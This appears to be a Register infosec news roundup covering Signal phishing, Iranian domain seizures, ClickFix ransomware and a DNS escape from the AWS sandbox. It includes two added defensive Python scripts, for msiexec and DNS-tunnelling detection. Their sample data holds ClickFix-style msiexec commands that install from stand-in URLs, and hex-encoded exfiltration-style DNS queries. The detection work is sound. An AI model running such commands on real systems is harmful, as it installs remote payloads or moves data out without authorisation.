Russians are posing as Signal support to launch phishing attacks
Infosec In Brief Russian intelligence-affiliated parties are posing as customer support services on commercial messaging applications such as Signal to compromise accounts and conduct phishing attacks, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday.
The attacks target people of high intelligence value, like former government officials, military figures, politicians, and even journalists [We’re flattered – Ed], and have snared thousands of individual accounts, allowing the Russians to read and send messages, and gather info from contact lists.
The attackers send messages advising users of “suspicious activity” related to their accounts and urge clicking a link to conduct a verification process. Once victims click, the baddies link their own devices to the victim’s account, or completely take over the account if the user is daft enough to submit credentials or a 2FA code.
Signal remains a highly secure way to exchange messages, but not even the best end-to-end encryption can stop intruders if users invite them in.
The FBI and CISA offer standard anti-phishing recommendations in their brief about the attacks.
Uncle Sam seizes four domains used for Iranian psyops
The US Department of Justice has seized domains associated with the Iran-linked group behind the cyberattack on med-tech firm Stryker.
These websites, the feds say, were used to incite violence and claim credit for disrupting the US med-tech firm’s operations. The domains were Justicehomeland[.]org, Handala-Hack[.]to, Karmabelow80[.]org and Handala-Redwanted[.]to.
The attack in question hit US med-tech firm Stryker through a hole in Microsoft Intune, wiping out information on employees’ devices. Iranian hacktivist group Handala, considered to be a front for the nation’s Ministry of Intelligence and Security (MOIS), claimed credit for the Stryker attack on one of the sites, Handala-hack[.]to.
Operators of the sites also used them to doxx members of the Israeli Defense Forces (IDF), and to post claims of having stolen 851GB of confidential data from the Sanzer Hasidic Jewish Community.
FBI chief Kash Patel warned in a statement: “This FBI will hunt down every actor behind these cowardly death threats and cyberattacks and will bring the full force of American law enforcement down on them.”
But someone claiming to represent Handala was not impressed, posting a defiant message that states: “They may have taken down our website, but they will never take down our spirit, our resolve, or the power of truth.”
That “truth” apparently includes allegations of “witchcraft ceremonies” by the Sanzer community, according to the FBI’s statement, echoing age-old antisemitic myths used to justify violence towards Jewish people.
Banking services company warns 670,000 people of data theft
Marquis, a company that provides services to banks, sent out warning notices to more than 670,000 people that their information was stolen by a ransomware gang last August.
The letter [PDF] poses the terrifying question: “Who Are We, and Why Do We Have Your Information?”, before explaining the company is a marketing provider for financial institutions.
Stolen data reportedly included sensitive info like Social Security numbers, taxpayer IDs, and account info.
In an attempt to make things right, Marquis offered victims one month’s free membership to a service from Epiq Privacy Solutions that’s meant to monitor misuse of personal information and resolve identity theft. It also encouraged victims to “remain vigilant by reviewing your account statements and credit reports for any unauthorized activity over the next 12 to 24 months,” as if we all don’t have enough on our plates already.
LeakNet discovers ClickFix social engineering
The LeakNet ransomware group has moved on from its usual tactic of buying stolen credentials and now uses the ClickFix social engineering scam, according to a new report from security shop Reliaquest.
ClickFix, which we’ve covered before, uses fake messages, delivered through compromised but legitimate websites, to convince victims to take actions such as running commands that load a rootkit or other malware.
LeakNet uses ClickFix to serve a fake “prove you are not a robot” dialog that asks users to open the Windows Run dialog with the Win + R shortcut and paste in a command that appears to be a link to a Cloudflare Turnstile verification page, but actually runs an msiexec command.
That command downloads and executes a cleverly disguised loader based on the (legitimate) Deno runtime, which then runs the bad code directly in memory, helping to disguise the attack from file-focused forensic scanning techniques.
The tactic, Reliaquest warns, could let LeakNet expand beyond its current hit rate of about three victims per month.
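Because the loader runs in memory, file scanning is the wrong place to look; process-creation telemetry is where the ClickFix step described above shows up. The script below is an added example (not Reliaquest's or LeakNet's code) that flags msiexec launches whose package argument is a remote URL, weighting the finding higher when the parent is an interactive shell such as explorer.exe, which is what the Win + R Run dialog launches through. The Sysmon-style event lines and the URLs in them are constructed for this example.

```python
"""Flag msiexec.exe launches that install a package from a remote URL.

Sample input is a handful of constructed process-creation events
(Sysmon Event ID 1 style), flattened to one line per event with
key=value fields separated by '|'. Values are made up for this example.
"""
import re
from dataclasses import dataclass

# Constructed sample events: two mimic the ClickFix pattern (msiexec run
# from an interactive shell with an http(s) package), the rest are noise.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\msiexec.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=msiexec /i https://challenge.example.invalid/verify /qn",
    "Image=C:\\Windows\\System32\\msiexec.exe|ParentImage=C:\\Windows\\System32\\services.exe|"
    "CommandLine=msiexec /V",
    "Image=C:\\Windows\\System32\\msiexec.exe|ParentImage=C:\\Program Files\\Installer\\setup.exe|"
    "CommandLine=msiexec /i C:\\Temp\\app.msi /quiet",
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=notepad.exe",
    "Image=C:\\Windows\\SysWOW64\\msiexec.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=msiexec.exe /package http://cdn.example.invalid/verify.msi /quiet /norestart",
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Parents that indicate a user typed or pasted the command. The Run dialog
# (Win + R) launches its child under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


@dataclass
class Finding:
    severity: str      # "high" for interactive parent, "medium" otherwise
    parent: str        # basename of the parent process
    url: str           # the remote package the command would fetch
    command_line: str


def parse_event(line: str) -> dict:
    """Split 'k=v|k=v' into a dict; values may themselves contain '='."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(line: str):
    """Return a Finding for an msiexec launch with a URL argument, else None."""
    ev = parse_event(line)
    if basename(ev.get("Image", "")) != "msiexec.exe":
        return None
    match = URL_RE.search(ev.get("CommandLine", ""))
    if not match:
        return None
    parent = basename(ev.get("ParentImage", ""))
    # Remote packages from software-deployment tooling can be legitimate, so
    # only an interactive parent is rated high.
    severity = "high" if parent in INTERACTIVE_PARENTS else "medium"
    return Finding(severity, parent, match.group(0), ev["CommandLine"])


def scan(lines):
    """Run analyze() over every event and keep the hits."""
    return [f for f in (analyze(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] parent={finding.parent} url={finding.url}")
```

The point of the parent check is the Run-dialog step itself: a user pasting a command produces an explorer.exe child, whereas managed software deployment normally runs msiexec under a service or installer process.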
The AWS sandbox that isn’t
Security outfit BeyondTrust Phantom Labs claims that the AWS Bedrock AgentCore code interpreter’s sandbox isn’t much of a sandbox at all. Although Amazon said running this service in sandbox mode blocked external access entirely, Phantom Labs claims that public DNS queries get through, which could let malevolent outsiders establish command-and-control channels and suck out data.
Phantom Labs says it told AWS about the problem last September through a HackerOne report, and AWS deployed a fix in November 2025 – but later rolled it back “due to other factors.” The end result? In December, Amazon updated its documentation to recommend customers use virtual private cloud mode if they want complete control over all inbound traffic.
Amazon awarded the researcher a $100 gift card to the AWS Gear Shop, Phantom Labs says.
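If DNS is the one channel a supposedly isolated sandbox leaves open, the resolver log is where a defender would notice it being abused. The script below is an added example (not BeyondTrust's, Phantom Labs' or AWS's code) that scores resolver log lines for the classic tunnelling signature: many distinct, long, high-entropy subdomain labels under one registered domain. The log lines, client address and domain names are constructed for this example, and the zone split (last two labels) is a deliberate simplification.

```python
"""Score DNS query logs for tunnelling / exfiltration indicators.

Input is a constructed resolver log, one query per line. The indicator is
volume of unique, long, high-entropy labels under a single registered
domain, which is what encoded data carried in query names looks like.
"""
import math
from collections import defaultdict

# Constructed sample: ordinary lookups, repeated lookups of one CDN name,
# and five queries carrying hex-encoded labels under example.invalid.
SAMPLE_LOG = """\
2025-11-02T10:00:01Z client=10.0.4.17 qname=pypi.org qtype=A
2025-11-02T10:00:01Z client=10.0.4.17 qname=files.pythonhosted.org qtype=A
2025-11-02T10:00:02Z client=10.0.4.17 qname=cdn.vendor.invalid qtype=A
2025-11-02T10:00:03Z client=10.0.4.17 qname=cdn.vendor.invalid qtype=A
2025-11-02T10:00:04Z client=10.0.4.17 qname=cdn.vendor.invalid qtype=A
2025-11-02T10:00:05Z client=10.0.4.17 qname=cdn.vendor.invalid qtype=A
2025-11-02T10:00:06Z client=10.0.4.17 qname=a3f9c1e07b24d8e6f15a9c3b.0.t.example.invalid qtype=TXT
2025-11-02T10:00:06Z client=10.0.4.17 qname=5e2d7c81f0a3b96e4d1c8f27.1.t.example.invalid qtype=TXT
2025-11-02T10:00:07Z client=10.0.4.17 qname=9b4e6a1d2f8c0375e1a9b7d4.2.t.example.invalid qtype=TXT
2025-11-02T10:00:07Z client=10.0.4.17 qname=c7d2e94f1b0a8356d4c2e7f9.3.t.example.invalid qtype=TXT
2025-11-02T10:00:08Z client=10.0.4.17 qname=1f8a3c5e7b9d0246a1c3e5f7.4.t.example.invalid qtype=TXT
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's byte distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    """Return (qname, qtype) from one 'timestamp k=v k=v ...' log line."""
    fields = dict(tok.split("=", 1) for tok in line.split()[1:])
    return fields["qname"].lower().rstrip("."), fields["qtype"].upper()


def split_name(qname: str):
    """Naive zone split: last two labels are the registered domain.

    Assumption for this example; production code should use the Public
    Suffix List so that names like example.co.uk are handled correctly.
    """
    labels = qname.split(".")
    return ".".join(labels[-2:]), labels[:-2]


def suspicious_domains(log_text: str, min_queries: int = 4,
                       min_label_len: int = 20, min_entropy: float = 3.0):
    """Return [(domain, stats)] for domains whose subdomain traffic looks encoded."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "label_lens": [], "entropies": [], "txt": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        qname, qtype = parse_line(line)
        domain, sub = split_name(qname)
        if not sub:                      # bare registered domain, nothing to score
            continue
        s = stats[domain]
        s["queries"] += 1
        s["subdomains"].add(".".join(sub))
        longest = max(sub, key=len)      # the label most likely to carry payload
        s["label_lens"].append(len(longest))
        s["entropies"].append(shannon_entropy(longest))
        if qtype in ("TXT", "NULL", "CNAME"):
            s["txt"] += 1

    findings = []
    for domain, s in stats.items():
        if s["queries"] < min_queries:
            continue
        unique_ratio = len(s["subdomains"]) / s["queries"]
        mean_len = sum(s["label_lens"]) / len(s["label_lens"])
        mean_entropy = sum(s["entropies"]) / len(s["entropies"])
        # Repeated lookups of the same CDN name fail the uniqueness test;
        # short, wordy labels fail the length and entropy tests.
        if unique_ratio >= 0.8 and mean_len >= min_label_len and mean_entropy >= min_entropy:
            findings.append((domain, {
                "queries": s["queries"], "unique_ratio": unique_ratio,
                "mean_label_len": mean_len, "mean_entropy": mean_entropy,
                "txt_fraction": s["txt"] / s["queries"]}))
    return findings


if __name__ == "__main__":
    for domain, info in suspicious_domains(SAMPLE_LOG):
        print(domain, info)
```

The thresholds are starting points, not tuned values: legitimate services (anti-virus lookups, some CDNs) also emit long hashed labels, so in practice the score is combined with an allowlist and with the sandbox's expected egress policy, which in the AgentCore case would be that no public resolution should be happening at all.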
Strava leaks location of aircraft carrier
French newspaper Le Monde last week reported that a mariner aboard an aircraft carrier went for a seven-kilometer run on its deck – while tracking it with his smartwatch, which later uploaded the run to the exercise-tracking site Strava.
The aircraft carrier’s location was therefore visible to the world, which The Register understands is a fact navies don’t like to reveal. France’s armed forces should know better, given president Emmanuel Macron’s bodyguards reportedly leaked their locations with the fitness app. – Simon Sharwood ®